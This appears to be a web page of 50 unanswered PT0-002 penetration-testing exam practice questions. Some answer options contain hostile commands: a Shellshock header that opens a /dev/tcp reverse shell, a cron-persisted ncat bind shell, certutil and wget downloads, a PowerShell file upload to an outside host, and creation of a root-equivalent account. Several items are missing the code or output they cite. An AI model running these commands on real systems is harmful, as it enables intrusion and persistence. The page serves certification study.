PT0-002 Practice Exam Free – 50 Questions to Simulate the Real Exam
Are you getting ready for the PT0-002 certification? Take your preparation to the next level with our PT0-002 Practice Exam Free – a carefully designed set of 50 realistic exam-style questions to help you evaluate your knowledge and boost your confidence.
Using a PT0-002 practice exam free is one of the best ways to:
- Experience the format and difficulty of the real exam
- Identify your strengths and focus on weak areas
- Improve your test-taking speed and accuracy
Below, you will find 50 realistic PT0-002 practice exam free questions covering key exam topics. Each question reflects the structure and challenge of the actual exam.
A penetration tester wants to accomplish ARP poisoning as part of an attack. Which of the following tools will the tester MOST likely utilize?
A. Wireshark
B. Netcat
C. Nmap
D. Ettercap
Which of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine?
A. Wireshark
B. EAPHammer
C. Kismet
D. Aircrack-ng
A penetration tester who is performing an engagement notices a specific host is vulnerable to EternalBlue. Which of the following would BEST protect against this vulnerability?
A. Network segmentation
B. Key rotation
C. Encrypted passwords
D. Patch management
A company has hired a penetration tester to deploy and set up a rogue access point on the network. Which of the following is the BEST tool to use to accomplish this goal?
A. Wireshark
B. Aircrack-ng
C. Kismet
D. Wifite
A penetration tester keeps a running diary of the day-to-day engagement activity. Which of the following is the most likely explanation for keeping the diary?
A. To facilitate post-engagement cleanup
B. To monitor lessons learned
C. To foster client acceptance
D. To follow the data destruction process
A penetration tester opened a shell on a laptop at a client's office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks. Which of the following is the BEST method available to pivot and gain additional access to the network?
A. Set up a captive portal with embedded malicious code.
B. Capture handshakes from wireless clients to crack.
C. Span deauthentication packets to the wireless clients.
D. Set up another access point and perform an evil twin attack.
PCI DSS requires which of the following as part of the penetration-testing process?
A. The penetration tester must have cybersecurity certifications.
B. The network must be segmented.
C. Only externally facing systems should be tested.
D. The assessment must be performed during non-working hours.
Which of the following factors would a penetration tester MOST likely consider when testing at a location?
A. Determine if visas are required.
B. Ensure all testers can access all sites.
C. Verify the tools being used are legal for use at all sites.
D. Establish the time of the day when a test can occur.
A penetration tester completed an assessment, removed all artifacts and accounts created during the test, and presented the findings to the client. Which of the following happens NEXT?
A. The penetration tester conducts a retest.
B. The penetration tester deletes all scripts from the client machines.
C. The client applies patches to the systems.
D. The client clears system logs generated during the test.
A penetration tester is evaluating a company's network perimeter. The tester has received limited information about defensive controls or countermeasures, and limited internal knowledge of the testing exists. Which of the following should be the FIRST step to plan the reconnaissance activities?
A. Launch an external scan of netblocks.
B. Check WHOIS and netblock records for the company.
C. Use DNS lookups and dig to determine the external hosts.
D. Conduct a ping sweep of the company’s netblocks.
A penetration tester developed the following script to be used during an engagement:
However, when the penetration tester ran the script, the tester received the following message: socket.gaierror: [Errno -2] Name or service not known
Which of the following changes should the penetration tester implement to fix the script?
A.
B.
C.
D.
A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a shell. However, a connection was not established, and no errors were shown on the payload execution. The penetration tester suspected that a network device, like an IPS or next-generation firewall, was dropping the connection. Which of the following payloads are MOST likely to establish a shell successfully?
A. windows/x64/meterpreter/reverse_tcp
B. windows/x64/meterpreter/reverse_http
C. windows/x64/shell_reverse_tcp
D. windows/x64/powershell_reverse_tcp
E. windows/x64/meterpreter/reverse_https
A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.)
A. Spawned shells
B. Created user accounts
C. Server logs
D. Administrator accounts
E. Reboot system
F. ARP cache
Which of the following is a ROE component that provides a penetration tester with guidance on who and how to contact the necessary individuals in the event of a disaster during an engagement?
A. Engagement scope
B. Communication escalation path
C. SLA
D. SOW
During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout?
A. Mask
B. Rainbow
C. Dictionary
D. Password spraying
A penetration tester is trying to bypass an active response tool that blocks IP addresses that have more than 100 connections per minute. Which of the following commands would allow the tester to finish the test without being blocked?
A. nmap -sU -p 1-1024 10.0.0.15
B. nmap -p 22,25,80,3389 -T2 10.0.0.15 -Pn
C. nmap -T5 -p 1-65535 -A 10.0.0.15
D. nmap -T3 -F 10.0.0.15
A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?
A. Maximizing the likelihood of finding vulnerabilities
B. Reprioritizing the goals/objectives
C. Eliminating the potential for false positives
D. Reducing the risk to the client environment
A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier. Which of the following is the BEST action for the penetration tester to take?
A. Utilize the tunnel as a means of pivoting to other internal devices.
B. Disregard the IP range, as it is out of scope.
C. Stop the assessment and inform the emergency contact.
D. Scan the IP range for additional systems to exploit.
A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet. Which of the following tools or techniques would BEST support additional reconnaissance?
A. Wardriving
B. Shodan
C. Recon-ng
D. Aircrack-ng
A penetration tester who is working remotely is conducting a penetration test using a wireless connection. Which of the following is the BEST way to provide confidentiality for the client while using this connection?
A. Configure wireless access to use a AAA server.
B. Use random MAC addresses on the penetration testing distribution.
C. Install a host-based firewall on the penetration testing distribution.
D. Connect to the penetration testing company’s VPS using a VPN.
A security analyst is conducting an unknown environment test from 192.168.3.3. The analyst wants to limit observation of the penetration tester's activities and lower the probability of detection by intrusion protection and detection systems. Which of the following Nmap commands should the analyst use to achieve this objective?
A. nmap -F 192.168.5.5
B. nmap --data-length 2 192.168.5.5
C. nmap -D 0.5.2.2 192.168.5.5
D. nmap --scanflags SYNFIN 192.168.5.5
A penetration tester executes the following Nmap command and obtains the following output:
Which of the following commands would BEST help the penetration tester discover an exploitable service?
A. nmap -v -p 25 --script smtp-enum-users remotehost
B. nmap -v --script=mysql-info.nse remotehost
C. nmap --script=smb-brute.nse remotehost
D. nmap -p 3306 --script "http*vuln*" remotehost
After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:
The tester then runs the following command from the previously exploited system, which fails:
Which of the following explains the reason why the command failed?
A. The tester input the incorrect IP address.
B. The command requires the --port 135 option.
C. An account for RDP does not exist on the server.
D. PowerShell requires administrative privilege.
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees. Which of the following tools can help the tester achieve this goal?
A. Metasploit
B. Hydra
C. SET
D. WPScan
While performing the scanning phase of a penetration test, the penetration tester runs the following command: nmap -n -vv -sV -p- 10.10.10.23-28 After the Nmap scan is finished, the penetration tester notices all hosts seem to be down. Which of the following options should the penetration tester try NEXT?
A. -sU
B. -Pn
C. -sn
D. -sS
A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester's decision?
A. The tester had the situational awareness to stop the transfer.
B. The tester found evidence of prior compromise within the data set.
C. The tester completed the assigned part of the assessment workflow.
D. The tester reached the end of the assessment time frame.
A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?
A. Smurf
B. Ping flood
C. Fraggle
D. Ping of death
A company recruited a penetration tester to brute force an SSH password on a server. The tester would like to use THC Hydra to perform the attack and remembers the use of the -t option. Which of the following should be considered when using this option?
A. The number of connects in parallel per target
B. The number of task connects in parallel overall
C. The waiting time for a response between connects per threads
D. If the output shows log-ins and passwords for each attempt
Which of the following tools would be BEST suited to perform a manual web application security assessment? (Choose two.)
A. OWASP ZAP
B. Nmap
C. Nessus
D. BeEF
E. Hydra
F. Burp Suite
A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server?
A. OpenVAS
B. Nikto
C. SQLmap
D. Nessus
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploit = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
A. exploit = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
B. exploit = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
C. exploit = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
D. exploit = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1" "Accept": "text/html,application/xhtml+xml,application/xml"}
After running the enum4linux.pl command, a penetration tester received the following output:
Which of the following commands should the penetration tester run NEXT?
A. smbspool //192.160.100.56/print$
B. net rpc share -S 192.168.100.56 -U ""
C. smbget //192.168.100.56/web -U ""
D. smbclient //192.168.100.56/web -U "" -N
Performing a penetration test against an environment with SCADA devices brings an additional safety risk because the:
A. devices produce more heat and consume more power.
B. devices are obsolete and are no longer available for replacement.
C. protocols are more difficult to understand.
D. devices may cause physical world effects.
A penetration tester gains access to a web server and notices a large number of devices in the system ARP table. Upon scanning the web server, the tester determines that many of the devices are user workstations. Which of the following should be included in the recommendations for remediation?
A. Start a training program on proper access to the web server.
B. Build a patch-management program for the web server.
C. Place the web server in a screened subnet.
D. Implement endpoint protection on the workstations.
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
✑ The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
✑ Network management interfaces are available on the production network.
✑ An Nmap scan returned the following:
Port State Service Version
22/tcp open ssh Cisco SSH 1.25 (protocol 2.0)
80/tcp open http Cisco IOS http config
|_https-title: Did not follow redirect to https://10.50.100.16
443/tcp open https Cisco IOS https config
Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)
A. Enforce enhanced password complexity requirements.
B. Disable or upgrade SSH daemon.
C. Disable HTTP/301 redirect configuration.
D. Create an out-of-band network for management.
E. Implement a better method for authentication.
F. Eliminate network management and control interfaces.
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester start this process?
A. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/accesschk64.exe
B. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php', 'systeminfo.txt')
C. schtasks /query /fo LIST /v | find /I "Next Run Time:"
D. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
A. PLCs will not act upon commands injected over the network.
B. Supervisors and controllers are on a separate virtual network by default.
C. Controllers will not validate the origin of commands.
D. Supervisory systems will detect a malicious injection of code/commands.
During an assessment, a penetration tester found a suspicious script that could indicate a prior compromise. While reading the script, the penetration tester noticed the following lines of code:
Which of the following was the script author trying to do?
A. Spawn a local shell.
B. Disable NIC.
C. List processes.
D. Change the MAC address.
A penetration tester uncovers access keys within an organization's source code management solution. Which of the following would BEST address the issue? (Choose two.)
A. Setting up a secret management solution for all items in the source code management system
B. Implementing role-based access control on the source code management system
C. Configuring multifactor authentication on the source code management system
D. Leveraging a solution to scan for other similar instances in the source code management system
E. Developing a secure software development life cycle process for committing code to the source code management system
F. Creating a trigger that will prevent developers from including passwords in the source code management system
A consulting company is completing the ROE during scoping. Which of the following should be included in the ROE?
A. Cost of the assessment
B. Report distribution
C. Testing restrictions
D. Liability
A penetration tester is assessing a wireless network. Although monitoring the correct channel and SSID, the tester is unable to capture a handshake between the clients and the AP. Which of the following attacks is the MOST effective to allow the penetration tester to capture a handshake?
A. Key reinstallation
B. Deauthentication
C. Evil twin
D. Replay
During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited?
A. Command injection
B. Broken authentication
C. Direct object reference
D. Cross-site scripting
The delivery of a penetration test within an organization requires defining specific parameters regarding the nature and types of exercises that can be conducted and when they can be conducted. Which of the following BEST identifies this concept?
A. Statement of work
B. Program scope
C. Non-disclosure agreement
D. Rules of engagement
During an assessment, a penetration tester found a web component with no authentication requirements. The web component also allows file uploads and is hosted on one of the target public web servers. Which of the following actions should the penetration tester perform next?
A. Continue the assessment and mark the finding as critical.
B. Attempt to remediate the issue temporarily.
C. Notify the primary contact immediately.
D. Shut down the web server until the assessment is finished.
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?
A. Nmap
B. tcpdump
C. Scapy
D. hping3
The results of an Nmap scan are as follows:
Which of the following device types will MOST likely have a similar response?
A. Active Directory domain controller
B. IoT/embedded device
C. Exposed RDP
D. Print queue
A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client's expectations?
A. OWASP Top 10
B. MITRE ATT&CK framework
C. NIST Cybersecurity Framework
D. The Diamond Model of Intrusion Analysis
During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames. Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?
A. Sniff and then crack the WPS PIN on an associated WiFi device.
B. Dump the user address book on the device.
C. Break a connection between two Bluetooth devices.
D. Transmit text messages to the device.
During passive reconnaissance of a target organization’s infrastructure, a penetration tester wants to identify key contacts and job responsibilities within the company. Which of the following techniques would be the most effective for this situation?
A. Social media scraping
B. Website archive and caching
C. DNS lookup
D. File metadata analysis
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client's laptop. Which of the following can be used to ensure the tester is able to maintain access to the system?
A. schtasks /create /sc /ONSTART /tr C:\Temp\WindowsUpdate.exe
B. wmic startup get caption,command
C. (crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash") | crontab 2>/dev/null
D. sudo useradd -ou 0 -g 0 user
Free Access Full PT0-002 Practice Exam Free
Looking for additional practice? Click here to access a full set of PT0-002 practice exam free questions and continue building your skills across all exam domains.
Our question sets are updated regularly to ensure they stay aligned with the latest exam objectives—so be sure to visit often!
Good luck with your PT0-002 certification journey!